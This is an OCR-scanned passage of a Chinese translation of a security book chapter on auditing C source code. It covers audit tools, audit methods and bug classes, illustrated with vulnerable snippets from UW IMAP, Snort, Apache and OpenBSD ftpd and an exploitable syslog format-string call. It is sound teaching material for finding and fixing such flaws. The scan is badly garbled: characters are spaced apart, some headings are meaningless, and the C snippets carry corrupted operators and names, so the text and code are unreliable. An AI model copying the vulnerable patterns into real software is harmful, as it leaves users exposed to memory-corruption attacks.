试 工具 , 最 好 动手 写 一 个 , 或 扩展 你 现在 正在 用 的 模糊 测试 工具 , 这 样 的 话 , 你 可 能 会 在 巨大 的 、 
有 着 无 数 复杂 协议 的 程序 里 突然 发 现 简 单 的 栈 溢出 , 这 有 点 类 似 于 在 海滩 上 随意 漫步 却 发 现 了 一 
颗 璀 璨 的 红宝石 。 
















































































源码 审计 : 
导 找 漏洞 








软件 里 寻找 漏洞 的 方法 有 很 多 , 但 最 有 效 的 仍 数 源码 审计 。 现在 有 很 多 软件 是 开源 的 ， 

十 而且 有 些 厂商 也 共享 了 部 分 操作 系统 源码 。 有 了 源码 ， 再 辅 以 经 验 ， 在 软件 中 快速 找 
出 明显 漏洞 是 可 能 的 ， 如 果 再 多 花 些 时 间 ， 也 可 能 找 出 更 复杂 的 漏洞 。 虽 然 在 一 般 情 况 下 ， 二 进 
制 审计 也 是 可 行 的 ， 但 如 果 有 源码 ， 审 计 会 变 得 更 容易 。 本 章 将 介绍 怎样 审计 其 于 C 语 言 的 源码 
里 存在 的 所 有 漏洞 ， 主 要 介绍 怎样 检测 内 存 恶 化 漏洞 。 

审计 源码 的 人 都 有 自己 的 审计 理由 。 对 某 些 人 来 说 ， 源 码 审计 是 他 们 工作 的 一 部 分 ; 某 些 人 
则 将 此 作为 业余 爱好 ; 而 某 些 人 纯粹 是 出 于 确保 运行 于 系统 上 的 应 用 程序 的 安全 的 目的 。 当 然 也 
有 人 试图 通过 审计 源码 来 寻找 入 侵 系统 的 方法 。 不 管 出 于 什么 审计 理由 ， 源 码 审计 无 疑 是 寻找 漏 
洞 最 好 的 方法 。 如 果 可 以 访问 源码 ， 就 尽情 地 享用 吧 。 

发 现 漏洞 和 利用 漏洞 哪个 更 困难 ? 这样 的 争论 一 直到 现在 都 没有 定论 。 对 有 源码 的 人 来 说 ， 
某 些 漏洞 是 显而易见 的 ， 但 在 实际 环境 中 ， 它 们 却 几乎 是 不 可 利用 的 ; 然而 ,漏洞 可 以 利用 但 不 
易 发 现 这 种 情况 更 常见 。 以 我 的 经 验 ， 漏洞 研究 中 的 瓶颈 是 如 何 发 现 复 杂 的 漏 润 ， 而 不 是 如 何 破 
解 复杂 漏洞 。 

有 些 漏 洞 可 以 被 快速 识别 和 破解 , 而 有 些 漏洞 甚至 有 人 指出 它们 时 , 仍 难以 识别 。 软件 不 同 ， 
困难 级 别 和 挑战 也 各 不 相同 ， 不 容 置 疑 的 是 ， 的 确 有 很 多 很 差劲 的 软件 ， 但 同时 也 有 很 多 非常 安 
全 的 开源 软件 。 

成 功 的 审计 是 建立 在 对 漏洞 的 识别 和 理解 的 基础 上 的 .很 多 在 不 同 程序 中 发 现 的 漏洞 非常 相 
似 ， 如 果 你 在 某 个 程序 中 发 现 一 个 漏洞 ， 那 么 很 有 可 能 在 其 他 的 程序 中 发 现 同样 的 错误 。 当 然 ， 
要 想 更 仔细 地 查找 问题 ， 就 需要 更 深入 地 了 解 程序 了 ， 而 这 个 范围 通常 比 任何 单个 函数 涉及 的 范 
围 都 要 大 。 深 入 了 解 目标 程序 对 我 们 的 审计 非常 有 帮助 。 

和 前 几 年 相 比 ， 现 在 确实 有 更 多 的 人 从 事 源码 审计 工作 ,将 来 将 会 发 现 更 多 明显 的 漏洞 。 开 
发 者 也 会 变 得 更 有 安全 意识 ， 犯 错误 的 几率 也 会 减少 。 新 发 行 软件 里 的 小 漏洞 通常 很 快 就 会 被 发 
现 ， 漏 洞 研究 者 则 会 揪 住 这 些 漏洞 猛 批 一 顿 。 以 后 的 漏洞 研究 会 变 得 更 加 困难 。 但 新 的 代码 正在 
源源 不 断 地 产生 ， 偶 尔 也 会 发 现 新 的 错误 类 型 。 所 以 我 们 应 该 坚信 ， 每 个 软件 都 有 漏洞 ， 而 发 现 
它们 是 小 事 一 桩 。 
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18.1 IR 


如 果 仅 用 文本 编辑 器 和 grep， 那 么 源码 审计 将 是 一 件 非常 痛苦 的 事情 。 幸 好 ， 有 许多 非常 有 
用 的 工具 可 以 帮助 我 们 。 这 些 工 具 一 般 用 于 辅助 软件 开发 ， 但 它们 在 源码 审计 方面 也 有 上 佳 的 表 
现 。 审 计 小 程序 时 一 般 不 需要 特殊 的 工具 ， 但 对 于 包含 多 个 文件 和 目录 的 大 型 程序 米 说 ， 这 些 工 
有 具 ?就 非常 有 帮助 了 。 
18.1.1 Cscope 

Cscope 是 一 个 源码 阅读 工具 ， 对 审计 大 型 源码 树 非常 有 帮助 。 它 最 早 由 贝尔 实验 室 开 发 ， 由 
SCO 向 有 BSD 许 可 证 的 公众 提供 。 可 以 在 http://cscope.sourceforge.net/ 网 址 上 找到 它 。 

Cscope 可 以 定位 符号 的 定义 , 或 在 其 他 数据 中 给 定名 称 的 符号 引用 。 它 也 能 定位 所 有 给 定 函 
数 的 调用 ， 或 定位 某 个 函数 调用 的 所 有 函数 。 在 运行 时 ，Cscope 首 先 会 生成 一 个 符号 和 引用 的 数 
据 库 ， 这 个 数据 库 可 以 重复 使 用 。 它 既 可 以 很 方便 地 处 理 整个 操作 系统 的 源码 ， 也 可 以 使 在 一 个 
大 代码 库 里 搜索 特定 的 漏洞 变 得 更 容易 。 即 使 没有 明确 表示 支持 ， 它 也 能 在 每 个 UNIX 版 本 上 运 
行 ， 目 前 已 有 编译 好 的 Windows 版 本 。Cscope 对 审计 的 作用 是 无 法 估量 的 ， 许 多 安全 研究 者 都 经 
常 使 用 它 。 

许多 编辑 器 默认 支持 Cscope， 如 Vimn 和 Emacs， 可 以 直接 从 编辑 器 内 部 调用 它 。 


18.1.2 Ctags 

Ctags 特 别 适合 在 大 型 代码 库 里 定位 语言 标记 (符号 )， 它 会 生成 在 扫描 过 的 文件 里 包含 目标 
文件 语言 标记 定位 信息 的 文件 。 许多 编辑 器 都 支持 这 种 标记 文件 ， 它 允许 用 户 用 自己 喜爱 的 编辑 
器 轻松 浏览 源码 。 标 记 文件 支持 多 种 语言 ， 最 重要 的 是 ， 它 支持 C 和 C++。Ctags 的 特征 之 一 是 ， 
它 具 有 通过 光标 快速 转 到 高 亮 标记 的 能 力 ， 然 后 返回 到 以 前 的 定位 或 标记 栈 上 较 远 的 位 置 。 该 特 
征 允 许 像 执行 流程 那样 浏览 源码 。 可 以 在 http:/ctags.sourceforge.net/ 下 载 Ctags， 另 外 ， 许 多 Linux 
版 本 提供 编译 好 的 打包 文件 。 
18.1.3 ”编辑 器 

阅读 源码 时 使 用 的 文本 编辑 器 不 同 , 审计 的 舒适 度 就 会 有 很 大 差别 。 某 些 编辑 器 的 特性 有 利 
于 程序 开发 和 源码 审计 ， 就 成 为 我 们 的 首选 。 例 如 Vim (vi 的 增强 版 本 ) 和 Emacs， 除 了 提供 方便 
的 代码 编辑 和 搜索 功能 外 ， 它 们 还 提供 了 一 些 增强 功能 ， 如 括号 匹配 功能 《可 快速 定位 开 / 闭 括 
号 的 男 一 半 )。 在 审计 带 多 个 括号 的 表达 式 时 ， 这 样 的 功能 非常 有 用 。 

如 何 选择 文本 编辑 器 ,每 个 人 都 有 自己 的 想法 。 尽 管 某 些 编辑 器 的 确 比 其 他 的 要 好 一 些 , 但 
在 选择 时 ， 主 要 应 该 考虑 熟悉 程度 和 易 用 性 。 
18.1.4 Cbrowser 

许多 工具 都 提供 和 Cscope、Ctags 类 似 的 功能 。 例 如 Cbrowser， 它 为 Cscope 提 供 了 图 形 化 的 界 


O 除了 以 下 介绍 的 工具 外 ， 我 向 大 家 推荐 商业 工具 Source Insight， 它 当前 的 版 本 是 3.5.0058。 一 一 译 者 注 
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面 ， 习 惯 在 GUI 下 审计 源码 的 人 可 以 试 一 下 。 
18.2 自动 源码 分 析 工 具 


有 些 工 具 尝试 对 源码 进行 静态 分 析 ， 自 动 检测 漏洞 。 这 种 愿望 是 良好 的 ， 但 大 部 分 产品 只 能 
供 初 学 者 使 用 ， 而 且 直 到 现在 ， 还 没有 哪 一 个 工具 能 够 代替 有 经 验 的 审计 者 。 许 多 大 型 软件 厂商 
在 把 测试 代码 转 为 产品 代码 前 , 会 用 静态 分 析 工 具 检 测 简 单 的 漏洞 , 然而 , 这 些 工 具有 明显 不 足 ， 
不 能 发 现 复杂 的 漏洞 。 尽 管 如 此 ， 它 们 在 审计 大 的 、 没 有 进行 过 审计 的 源码 树 方面 还 是 有 一 些 帮 
助 的 。 

Splint 是 一 个 静态 分 析 工 具 ， 用 于 检测 C 程 序 里 的 安全 问题 。Splint 通 过 向 程序 中 插入 注解 的 
方式 执行 相对 较 强 的 安全 检查 。 这 个 分 析 引 擎 在 过 去 已 经 展示 出 其 检测 安全 问题 的 能 力 , 例如 它 
自动 发 现 的 BIND TSIG 溢 出 《虽然 是 在 这 个 漏洞 公布 之 后 )。 尽 管 Splint 在 处 理 大 的 、 复 杂 的 源码 
树 方面 有 些 问题 ， 但 仍 值得 一 试 。 它 由 弗吉尼亚 大 学 开发 ， 可 以 在 www.splint.org/ 网 址 处 找到 。 

CQual 是 一 个 评价 C 源 码 增 加 的 注解 的 应 用 程序 。 它 扩展 标准 的 C 类 型 限定 词 ， 添 加 像 tainted 
这 样 的 有 限定 词 ， 并 判断 哪些 限定 词 没有 被 明确 定义 的 变量 的 类 型 。CQual 可 以 检测 某 些 漏洞 ， 
如 格式 化 串 。 然 而 ， 和 手工 分 析 相 比 ， 它 并 不 能 发 现 更 复杂 的 问题 。CQual 由 JeffFoster 所 写 ， 可 
TEhttp://www.cs.umd.edu/-jfoster/cqual/ F $. 

”其 他 的 工具 (如 Secure Software 提 供 的 RATS ) 可 以 定位 简单 的 、 过 时 的 漏洞 。 一 些 错误 用 静 
态 分 析 可 能 会 更 好 检测 ， 其 他 的 一 些 公开 可 用 的 工具 自动 检测 潜在 的 格式 化 串 漏 洞 。 

一 般 来 说 ， 要 分 析 新 软件 里 发 现 的 相对 复杂 的 漏洞 ， 当 前 的 静态 分 析 工 具 都 无 能 为 力 。 上 面 
介绍 的 几 个 工具 对 初学 者 来 说 可 能 会 有 些 用 处 ， 但 远 远 无 法 满足 严谨 的 审计 者 检测 漏洞 的 需求 。 
18.3 方法论 

在 没有 具体 计划 的 情况 下 审计 程序 , 审计 者 可 能 会 有 所 收获 , 但 这 种 情形 仅仅 出 现在 他 们 在 
恰当 的 时 候 读 了 恰当 的 代码 ， 又 恰恰 看 到 以 前 忽略 的 内 容 。 如 果 想 在 程序 中 寻找 漏洞 ， 或 想 找 出 
目标 程序 中 所 有 的 漏洞 (这 应 该 是 专业 的 源码 审计 )， 那 你 需要 有 明确 的 方法 论 来 做 指导 。 要 什 
么 方法 论 呢 ? 这 要 视 目 标 程序 和 要 寻找 的 漏洞 而 定 。 我 们 在 这 里 简要 介绍 一 些 常见 的 审计 源码 的 
方法 。 

18.3.1 自 项 向 下 《明确 的 ) 的 方法 

在 自 顶 向 下 的 方法 中 ， 审 计 者 不 必 深 入 了 解 目标 程序 。 例 如 ， 审 计 者 为 了 找 出 影响 syslog 
函数 的 格式 化 串 漏 洞 ,只 需 搜索 整个 源码 树 ， 而 不必 逐 行 阅读 源码 。 这 个 方法 的 优点 是 效率 较 高 ， 
因为 它 不 要 求 审计 者 深入 了 解 目标 程序 。 但 这 个 方法 也 有 缺点 ， 比 如 说 那些 需要 深入 了 解 目标 程 
序 上 下 文才 能 发 现 的 漏洞 、 跨 越 多 段 代 码 的 漏洞 都 可 能 会 被 遗漏 。 自 顶 向 下 的 方法 比较 适合 寻找 
那些 只 读 一 行 代码 就 能 轻松 识别 的 漏洞 ， 而 那些 需要 深入 了 解 目标 程序 才能 找到 的 漏洞 ,用 其 他 
的 方法 会 好 一 些 。 
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18.3.2 BIS. LRA 

在 自 底 向 上 的 方法 中 , 审计 者 需要 阅读 大 部 分 的 源码 来 了 解 程序 的 内 部 工作 机 理 。 在 这 个 方 
法 中 ,一般 是 从 main 函 数 开 始 ， 从 进入 点 一 路 读 到 退出 点 ， 从 而 对 程序 有 一 个 全 面 的 了 解 。 尽 管 
这 个 方法 需要 大 量 的 时 间 ， 但 能 全 面 了 解 程序 ， 有 可 能 发 现 更 多 、 更 复杂 的 漏洞 。 

18.3.3 结合 法 

前 面 介绍 的 两 个 方法 都 有 些 问题 ， 而 这 些 问 题 将 妨碍 我 们 及 时 有 效 地 发 现 错误 。 然而 ， 如 果 
把 这 两 个 方法 结合 起 来 ， 效 果 会 更 好 一 些 。 通 常 来 说 ， 任何 代码 库 都 有 死 代 码 ?， 而 且 它 们 在 代 
码 库 中 占有 相当 大 的 比例 。 在 死 代码 中 寻找 漏洞 是 劳 而 无 功 的 ， 因为 在 实际 环境 中 ， 它 们 几乎 不 
会 被 触发 。 例 如 ， 在 分 析 Web 服 务 器 〈 属 主 为 root 的 ) 的 配置 程序 时 ， 代码 里 存在 的 缓冲 区 溢出 
就 算 不 上 真正 的 漏洞 。 为 了 节省 时 间 、 提 高 效率 ， 审计 那些 最 有 可 能 包含 安全 问题 而 又 可 以 被 利 
用 的 代码 段 会 更 有 意义 。 

在 结合 法 中 , 审计 者 先 通过 输入 定义 的 攻击 者 来 定位 可 疑 的 代码 ， 然后 把 大 部 分 精力 放 在 小 
范围 代码 段 上 ， 当 然 ， 全面 了 解 代码 的 关键 部 分 也 非常 有 用 。 如 果 你 不 知道 正在 审计 的 代码 段 在 
做 什么 或 它 适 合 于 程序 的 哪个 地 方 ， 那 你 应 该 花 些 时 间 来 了 解 它 的 上 下 文 ， 只 有 这 样 ， 你 才 不 会 
在 毫 无 益处 的 审计 上 浪费 时 间 。 在 死 代 码 里 或 你 不 能 控制 输入 的 情形 中 发 现 严 重 的 漏洞 最 让 人 池 
ET. 

总 的 来 说 ， 大 多 数 成 功 的 审计 都 会 选用 结合 法 。 结 合法 通常 是 寻找 漏洞 最 有 效 的 方法 之 一 。 
18.4 漏洞 分 类 

把 常见 的 或 不 常见 的 错误 分 类 有 很 多 好 处 。 虽然 下 面 列 的 不 是 很 全 面 , 但 应 该 包括 了 大 部 分 
错误 类 型 。 按 以 往 的 趋势 ， 每 隔 几 年 就 会 出 现 新 的 错误 类 型 ， 与 之 相关 的 大 部 分 漏洞 会 被 立即 发 
现 ， 而 剩 下 的 则 会 随 着 时 间 的 推移 逐渐 浮 出 水 面 ， 关 键 在 于 怎样 寻找 它们 。 

18.4.1 普通 逻辑 错误 

虽然 普通 逻辑 错误 不 太 起 眼 , 但 却 是 诸多 问题 的 根源 。 为 了 在 程序 的 设计 逻辑 中 发 现 可 能 导 
致 安全 条 件 〈condition) 缺陷 的 问题 ， 必 须 深 入 了 解 程序 的 内 部 结构 。 理 解 内 部 结构 、 应 用 程序 
和 可 能 误 用 的 错误 方法 的 特定 类 型 ， 都 会 对 我 们 有 所 帮助 。 例 如 ， 如 果 程 序 使 用 普通 的 缓冲 区 结 
构 或 字符 串 类 , 深入 理解 程序 就 可 以 找 出 程序 中 错 用 或 有 问题 的 结构 成 员 或 类 的 位 置 。 当 审计 一 
个 相当 安全 的 和 已 经 仔细 审计 过 的 程序 时 ， 接 下 来 应 该 做 的 是 搜寻 普通 逻辑 错误 。 

18.4.2 LF) 绝迹 的 错误 分 类 

5 年 前 在 开源 软件 里 经 常 可 以 看 到 的 漏洞 ， 现 在 几乎 绝迹 了 。 这 类 漏洞 通常 是 那些 没有 限制 

内 存 副 本 的 函数 引起 的 ， 如 strcpy、sprintf 和 strcat。 今 天 ， 虽 然 这 些 函 数 依然 存在 ， 但 程 





(D 运行 过 程 中 基本 或 完全 不 会 被 执行 的 代码 。 一 一 译 者 注 
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序 员 基 本 上 都 在 保证 安全 的 前 提 下 使 用 它们 。 以 前 经 常 能 看 到 鲁 用 这 些 函 数 导 致 的 缓冲 区 溢出 的 
情况 ， 但 在 现在 的 开源 软件 里 已 经 找 不 到 这 种 漏洞 了 。 

strcpy、sprintf、strcat、gets 和 类 似 的 函数 没有 目的 缓冲 区 大 小 的 概念 。 如 果 我 们 适 
当 分 配 目的 缓冲 区 ,或 在 复制 数据 之 前 检查 输入 数据 的 大 小 ,那么 安全 使 用 大 部 分 的 函数 是 有 可 
能 的 。 然 而 ， 如 果 没 有 进行 正确 的 安全 检查 ， 这 些 函数 就 是 潜在 的 安全 风险 。 我 们 对 这 些 函 数 的 
安全 问题 已 经 有 强烈 的 意识 , 例如 ，sprintf 和 strcpy 在 它们 的 操作 手册 中 提 到 ， 在 调用 这 些 函 
数 之 前 不 进行 边界 检查 是 危险 的 。 

1998 年 在 华盛顿 大 学 IMAP 服 务 器 里 发 现 的 洲 出 就 是 这 类 漏洞 的 例证 。 这 个 漏洞 影响 
authenticate 命 令 ， 其 原因 是 在 没有 进行 边界 检查 的 情况 下 把 字符 串 复制 到 栈 缓冲 区 。 

char tmp[MAILTMPLEN]; 


AUTHENTICATOR *auth; 
/* make upper case copy of mechanism name */ 


ucase (strcpy (tmp,mechanism)}; 
在 以 前 ， 把 输入 字符 串 转 换 成 大 写字 母 对 破解 者 来 说 是 一 项 有 意思 的 挑战 ， 然 而 ， 如 今 它 已 
不 再 重要 。 修 补 这 类 漏洞 只 需 检 查 输 入 字符 串 的 大 小 ， 拒 绝 接受 太 长 的 字符 串 就 可 以 了 。 


/* cretins still haven't given up */ 
if (strlen (mechanism) >= MAILTMPLEN) 
syslog (LOG ALERT|LOG. AUTH, "System break-in attempt, host=%.80s", 
tep_clienthost ()); 


18.4.3 ”格式 化 串 

格式 化 串 类 漏洞 是 在 2000 年 的 某 个 时 候 发 现 的 , 在 过 去 的 几 年 中 , 人 们 发 现 了 多 个 与 之 相关 
的 严重 漏洞 。 发 生 格式 化 串 错 误 的 原因 在 于 攻击 者 能 控制 传递 给 接受 printf 类 型 参数 的 格式 化 
串 函 数 〈 包 括 *printf、syslog 和 类 似 的 函数 )。 如 果 攻 击 者 能 控制 格式 化 串 ， 他 就 能 传递 将 导 
致 内 存 恶化 和 执行 任意 代码 的 格式 符 。 对 这 些 漏洞 的 利用 ， 在 很 大 程度 取决 于 前 面 提 过 的 上 泌 的 
sn 格式 符 ， 它 将 可 打印 的 字 节 数 写 入 整 型 指针 参数 。 

在 审计 过 程 中 很 容易 发 现 格 式 化 串 问 题 。 仅 通过 限制 函数 接受 printt 类 型 参数 的 数量 ， 识 
别 对 这 些 函 数 的 调用 ， 验 证 攻击 者 是 否 能 够 控制 格式 化 串 就 足够 了 。 例 如 ， 下 列 可 利用 的 和 不 可 
利用 的 syslog 调 用 看 起 来 明显 不 同 。 

可 利用 的 如 下 ， 

syslog (LOG_ERR,string); 

不 可 利用 的 如 下 : 

syslog(LOG_ERR, "%s", string); 

如 果 攻击 者 可 以 控制 string,“ 可 利用 的 ”例子 就 可 能 存在 安全 风险 。 在 实际 的 审计 过 程 中 ， 
你 必须 找 出 数据 的 来 源 ， 通 过 一 些 函 数 验证 格式 化 串 漏洞 是 否 存在 。 因 为 有 些 程序 使 用 自 定 义 的 
printf-1like 函 数 ， 因 此 ,我 们 的 审计 不 应 只 局 限于 一 小 扎 最 容易 出 问题 的 函数 。 对 格式 化 串 的 
审计 可 以 按 标准 行事 ， 自 动 检测 错误 是 否 存在 是 有 可 能 的 。 
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格式 化 串 错误 通常 出 现在 日 志 记录 代码 里 。 经 常 可 以 看 到 常量 格式 化 串 传 给 日 志 记录 函数 ， 
但 没 想到 输入 会 复制 到 缓冲 区 ， 并 以 可 利用 的 方式 传 给 syslog。 下 列 的 例子 说 明日 志 记 录 代码 
里 的 格式 化 串 漏 洞 : 


void log_fn(const char *fmt,..) { 


va_list args; 
char log_buf[1024]; 


va, start(args,fmt); 

vsnprintf (log_buf, sizeof (log_buf), fmt, args) ; 
va end(args); 

syslog(LOG NOTICE,log buf); 


} 

格式 化 串 漏 洞 最 早 是 在 wu-ftpd 服务 器 里 发 现 的 ， 接 着 ， 在 其 他 的 程序 里 也 发 现 了 它们 的 身 
影 。 然 而 ， 因 为 通过 审计 可 以 轻易 发 现 这 类 漏 润 ， 所 以 它们 很 快 就 从 绝 大 多 数 的 开源 软件 里 销 声 
BERT. 
18.4.4 ”错误 的 边界 检查 

应 用 程序 一 般 都 会 进行 边界 检查 ,但 很 多 时 候 ， 这 些 检查 都 不 正确 。 虽 说 不 正确 的 检查 和 不 
做 检查 是 有 区 别 的 ， 但 结果 都 一 样 ; 它们 都 属于 逻辑 错误 。 除 非 深 入 分 析 边 界 检 查 ， 否 则 很 难 发 
现 这 类 问题 。 换 句 话说 , 不 要 因为 程序 执行 了 边界 检查 ,就 假定 它 是 安全 的 。 正确 的 做 法 应 该 是 ， 
在 审计 其 他 代码 之 前 ， 先 验证 这 些 检查 是 否 已 正确 完成 。 

2003 年 的 早 些 时 候 ，ISS X-Force 发 现 的 Snort RPC 预 处 理 程序 错误 就 是 没有 正确 进行 边界 检 
查 的 例子 。 下 面 是 在 Snort 内 发 现 的 有 问题 的 代码 段 。 


while(index < end) 


{ 





/* get the fragment length (31 bits) and move the pointer to the 
start of the actual data */ 
hdrptr = (int *) index; 


length = (int) (*hdrptr & Ox7FFFFFFF); 
if(length > size) 
{ 


DebugMessage(DEBUG FLOW, "WARNING: rpc decode calculated bad 


"length: d\n", length); 
return; 
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else 

{ 
total_len += length; 
index += 4; 
for (i=0; i < length; i++,rpce++,indext++,hdrptr++) 

*rpc - *index; 
} 
} 


在 程序 里 ，length 是 RPC 碎 片 的 长 度 ，size 是 数据 包 的 总 长 度 。 输 出 缓冲 区 和 输入 缓冲 区 
一 样 ， 分 别 在 两 个 地 方 被 rpc 和 index 变 量 引 用 。 这 段 代码 尝试 从 数据 流 里 剥离 包头 来 重组 RPC 
碎片 。rpc 和 index 随 着 每 次 循环 递增 ，total_1len 表 示 写 入 缓冲 区 的 数据 长 度 。 程 序 在 写 入 前 
尝试 进行 边界 检查 ， 但 这 个 检查 的 实现 有 些 问 题 。 为 什么 有 问题 昵 ?” 因 为 程序 把 当前 RPC 碎 片 的 
长 度 和 总 数据 长 度 做 比较 ， 但 正确 的 检查 应 该 是 把 所 有 RPC 碎 片 的 总 长 度 〈 包 括 当 前 的 ) 和 缓冲 
区 的 长 度 做 比较 。 这 个 检查 不 正确 ， 但 确实 在 代码 里 出 现 了 。 所 以 说 ， 如 果 你 只 是 草率 地 检查 ， 
很 可 能 就 不 再 深究 了 ， 而 想当然 地 认为 检查 是 有 效 的 一 一 这 个 例子 提示 我 们 ， 重 要 区 域 里 的 边界 
检查 都 应 经 过 验证 。 


18.4.5 ”循环 结构 

循环 结构 是 最 容易 发 生 溢出 的 地 方 , 可 能 因为 从 程序 员 的 角度 来 看 , 循环 结构 的 代码 比 线性 
的 代码 要 复杂 一 些 , 而 且 越 复杂 的 循环 结构 越 有 可 能 出 现 编程 错误 , 从 而 引入 漏洞 。 许多 流行 的 、 
安全 性 至 关 重要 的 程序 都 包含 难以 理解 的 循环 结构 ， 其 中 有 些 是 不 安全 的 。 一 般 来 说 ， 当 程序 中 
存在 循环 媒 套 时 ， 通 常会 导致 复杂 的 相互 作用 ， 更 容易 出 错 。 解 析 循 环 或 处 理 用 户 定义 的 输入 是 
开始 审计 的 好 地 方 ， 把 精力 集中 在 这 些 区 域 ， 可 以 事半功倍 。 

复杂 循环 结构 容易 出 问题 的 例子 是 Mark Dowd 发 现 的 Sendmail 里 的 crackadaz 函 数 的 漏洞 。 
这 个 函数 的 循环 结构 非常 大 ， 如 果 在 这 里 列 出 来 ,要 占用 很 多 篇 幅 ， 因 此 ， 建 议 你 阅读 它 的 源码 
来 了 解 相关 信息 。 由 于 这 个 循环 结构 十 分 复杂 ， 而 且 里 面 还 要 处 理 众多 变量 ， 所 以 在 处 理 某 些 输 
入 数据 的 模式 时 ， 出 现 缓冲 区 溢出 条 件 。 尽 管 Sendmail 的 开发 者 已 经 做 了 大 量 的 检查 来 防止 缓冲 
区 溢出 ， 但 代码 仍然 产生 了 意料 之 外 的 结果 。 一 些 关 于 这 个 漏洞 的 第 三 方 分 析 ， 其 中 包括 著名 的 
波兰 安全 研究 小 组 Last Stages of Delirium， 都 轻描淡写 地 描述 了 这 个 漏洞 的 可 破解 性 ， 因 为 他 们 
都 错过 了 一 个 可 能 导致 缓冲 区 溢出 的 输入 模式 。 
18.4.6 off-by-one 漏洞 

off -by-one 或 off-by-a-few 漏 洞 是 常见 的 编码 错误 ， 出 现 这 类 错误 的 主要 原因 是 ; 一 个 或 有 限 
个 字 节 写 到 分 配 内 存 边 界 之 外 。 这 种 漏洞 经 常 导 致 字符 串 没有 正确 地 以 "\o" 结 尾 , 在 循环 结构 里 
经 常 可 以 看 到 这 类 错误 , 常见 的 字符 串 函 数 也 可 能 会 引入 这 类 错误 。 这 类 错误 在 很 多 情况 下 都 可 
以 利用 ， 以 前 的 程序 里 还 经 常 可 以 看 到 它们 的 影子 。 

例如 ， 下 面 的 代码 摘自 Apache 2.0.46 之 前 的 某 个 Apache 2 版 本 。 这 个 漏洞 后 来 被 悄悄 地 补 上 
了 。 . 
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if (last_len + len > alloc len) { 
char *fold_buf; 
alloc_len += alloc_len; 
if (last_len + len > alloc_len) { 

alloc_len = last_len + len; 

} 
fold_buf = (char *)apr_palloc(r->pool, alloc_len); 
memcpy (fold buf, last field, last len); 
last field - fold buf; 

} 

memcpy(last field + last, len, field, len +1); /* «1 for nul */ 


在 处 理 MIME 头 的 代码 里 ， 作 为 请 求 的 部 分 发 到 Web 服务 器 后 ， 如 果 前 两 个 if 语 句 为 真 
(true), 将 分 配 1 字 节 长 的 缓冲 区 。 随后 的 memcepy 调 用 将 把 一 个 空 字 节 写 到 边界 之 外 。 由 于 Apache 
使 用 自 定 义 的 堆 实 现 ， 所 以 ， 要 验证 这 个 错误 还 是 比较 麻烦 的 ， 然 而 ， 它 仍 是 一 个 典型 的 处 理 以 
'\0' 结 尾 字符 串 的 off-by-one 例 子 。 

任何 在 结束 时 以 '\0' 作 为 字符 串 结 尾 的 循环 ， 都 应 当 进 行 双重 检查 ， 以 防止 出 现 off-by-one 
漏洞 。 下 列 代 码 是 在 OpenBSD ftp daemon 里 发 现 的 ， 足 以 说 明 这 个 问题 。 


char npath[MAXPATHLEN]; 


int i; 
for (i = 0; *name !- 'N0' && i < sizeof(npath) - 1; i++, name++) 
{ 
npath[i] = *name; 
if (*name == '"') 
mpath[++i] = '"' 

} 
npath[i] = '\0'; 


尽管 这 段 代 码 试 着 为 空 字 节 保留 空间 ， 但 是 ， 如 果 在 输出 缓冲 区 边界 末尾 的 字符 是 引号 ， 则 
将 会 出 现 一 个 off-by-one 漏 洞 。 

不 恰当 地 使 用 某 些 库 函数 也 可 能 引入 off-by-one 漏 洞 .例如 ,如果 调用 strncat 的 格式 不 正确 ， 
用 输出 缓冲 区 保留 的 空间 〈 因 为 没有 把 空 字 节 算 在 内 ， 所 以 长 度 比 正确 的 长 度 少 一 个 字 节 ) 作为 
它 的 第 三 个 参数 ， 将 会 把 空 字 节 写 到 边界 之 外 ， 从 而 将 输出 字符 串 以 '\0' 结 尾 。 

下 面 的 例子 显示 了 错误 的 strncat 用 法 : 


strcpy (buf, "Test:"); 
strncat (buf, input, sizeof (buf) -strlen(buf)); 


安全 的 用 法 应 该 是 : 
strncat(buf,input,sizeof(buf)-strlen(buf)-1); 
18.4.7” 非 正确 终止 问题 


要 想 安 全 地 处 理 字符 串 ， 必 须 使 它们 正确 地 以 '\0' 结 尾 ， 以 便 轻 松 确定 它们 的 边界 。 程 序 
在 执行 过 程 中 ， 如 果 碰 到 字符 串 没 有 被 正确 地 终止 ， 也 可 能 会 引起 安全 问题 。 例 如 ， 如 果 字 符 串 
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没有 正确 终止 , 周围 的 内 存 数据 可 能 会 被 当 作 字符 串 的 一 部 分 。 这 种 情形 对 安全 性 会 有 一 些 影响 ， 
例如 ， 大 幅度 增加 字符 串 的 长 度 或 修改 字符 串 的 操作 ， 将 会 破坏 字符 串 缓冲 区 边界 外 的 内 存 。 有 
些 库 函 数 天 生 就 存在 与 以 '\0' 结 尾 的 相关 问题 ， 我 们 在 审计 源码 时 ， 应 该 检查 这 些 情况 。 例 如 ， 
函数 strncpy 用 完 目的 缓冲 区 之 后 ,不 会 使 它 写 的 字符 串 以 '\0' 结 尾 ,程序 员 必 须 明确 地 使 字符 
串 '\0' 结 尾 ， 否 则 就 会 留 下 隐患 。 例 如 ， 下 面 的 代码 是 不 安全 的 。 


char dest_buf[256]; 
char not_term_buf [256]; 


strncpy (not_term_buf, input, sizeof (non_term_buf)); 


strcpy(dest buf,not term buf); 

因为 第 一 个 strncpy 没 有 使 on_term_puf 以 '\0， 结尾 ， 即使 两 个 缓冲 区 一 样 大 ， 第 二 个 
strcpy 也 不 安全 。 在 第 一 个 strncpy 和 第 二 个 strepy 之 间 ， 增 加 一 行 像 下 面 这 样 的 代码 ， 将 使 这 
段 代码 免 受 缓冲 区 溢出 的 影响 。 

not term buf[sizeof(not term buf) - 1] = 0; 

虽然 缓冲 区 周围 的 状态 对 利用 这 个 漏洞 有 一 定 的 影响 ,但 在 很 多 情况 下 ,我 们 可 以 利用 它 热 
行 代码 。 
18.4.8” 跳 过 以 '\0' 结 尾 问 题 

程序 中 某 些 可 利用 的 编程 错误 是 跳 过 字符 串 里 的 以 '\0' 结 尾 的 字 节 ， 然 后 继续 处 理 ， 直 至 
影响 未 定义 的 内 存 区 域 。 一 旦 跳 过 以 '\0' 结 尾 的 字 节 ， 如果 将 来 的 任何 处 理 引 起 一 个 写 操作 , 将 
可 能 引起 内 存 恶 化 ， 从 而 导致 执行 代码 。 这 类 漏洞 一 般 出 现在 处 理 字 符 串 的 循环 过 程 中 ,特别 是 
在 每 次 处 理 多 于 一 个 字符 或 假设 字符 串 的 长 度 已 经 确定 时 。 下 列 代码 例子 直到 最 近 才 在 Apache 
的 mod_rewrite 模 块 中 发 现 。 


else if (is_absolute_uri(r->filename)) { 
